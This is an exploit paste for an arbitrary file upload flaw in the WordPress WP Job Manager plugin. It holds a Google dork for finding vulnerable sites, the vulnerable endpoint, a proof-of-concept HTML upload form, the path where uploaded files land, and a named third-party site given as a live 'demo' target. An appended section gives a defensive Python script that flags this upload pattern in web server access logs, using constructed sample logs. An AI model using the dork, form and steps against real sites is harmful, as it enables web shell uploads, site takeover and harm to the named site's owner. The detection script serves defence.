- ##################################################JokerSecurity#########################################################
- # Title : WordPress Plugins WP Job Manager - Arbitrary File Upload
- # Dork : inurl:/wp-content/plugins/wp-job-manager/
- # Tested on: [ BlackBuntu ]
- # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
- # Myblog : http://kader-information.blogspot.com/
- ######################
- # [+] DESCRIPTION :
- ######################
- # 1: Search Google Dork and Choose a Target
- # 2: Exploit :
- ========
- https://localhost/jm-ajax/upload_file/
- Vulnerability :
- =======
- FormCraft {"files":[]}
- # 3: PoC :
- ====
- <form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
- <input type="file" name="files[]" />
- <button>Upload!</button><br/>
- </form>
- # 4: Upload Your File -=-=-=-=-=- File.jpg
- # 5: File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/YYYY/MM/your-files.jpg
- ######
- Demo :
- ######
- http://snuviktechnologies.com
- ######################
- subscribe for my channel and page in facebook
- # Website : http://dev-labs.co
- # My Blogger : http://kader-information.blogspot.com/
- # Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip
- # Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials/
- By <3
- ##################################################JokerSecurity#########################################################
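
For defenders, the two paths named in this paste (the /jm-ajax/upload_file/ endpoint and the job-manager-uploads directory) are enough to hunt for this activity in web server access logs. The following is an added example, not part of the original paste or of the plugin's code: it assumes combined-format access logs, a hypothetical site hostname example.test, and the heuristic (an assumption) that legitimate uploads carry a Referer from the site's own job form. The log lines are constructed sample data.

```python
import re
from collections import defaultdict

UPLOAD_ENDPOINT = "/jm-ajax/upload_file/"                  # endpoint named in the paste
UPLOAD_DIR = "/wp-content/uploads/job-manager-uploads/"    # storage path named in the paste
SITE_HOST = "example.test"                                 # assumption: the site's own hostname

# Apache/nginx "combined" log format: ip, request line, status, size, referer.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "POST /jm-ajax/upload_file/ HTTP/1.1" 200 187 "-" "curl/8.0"
203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /wp-content/uploads/job-manager-uploads/files/2024/03/File.jpg HTTP/1.1" 200 5120 "-" "curl/8.0"
198.51.100.20 - - [12/Mar/2024:10:05:00 +0000] "POST /jm-ajax/upload_file/ HTTP/1.1" 200 190 "https://example.test/post-a-job/" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2024:10:06:00 +0000] "GET /wp-content/uploads/job-manager-uploads/files/2024/03/logo.png HTTP/1.1" 200 900 "https://example.test/jobs/" "Mozilla/5.0"
"""

def find_suspect_uploads(log_text, site_host=SITE_HOST):
    """Return {ip: [fetched upload paths]} for clients that POSTed to the upload
    endpoint without an on-site Referer and then requested a stored file."""
    uploaders = set()
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue  # skip unparsable lines and unsuccessful requests
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            # An upload posted from an off-site form or a script has no on-site Referer.
            if f"//{site_host}/" not in m["referer"]:
                uploaders.add(m["ip"])
        elif (m["method"] == "GET" and path.startswith(UPLOAD_DIR)
              and m["ip"] in uploaders):
            hits[m["ip"]].append(path)
    return dict(hits)

if __name__ == "__main__":
    print(find_suspect_uploads(SAMPLE_LOG))
```

Referer is client-controlled, so treat a match as a lead for review of the stored files rather than as proof, and treat the absence of a match as inconclusive.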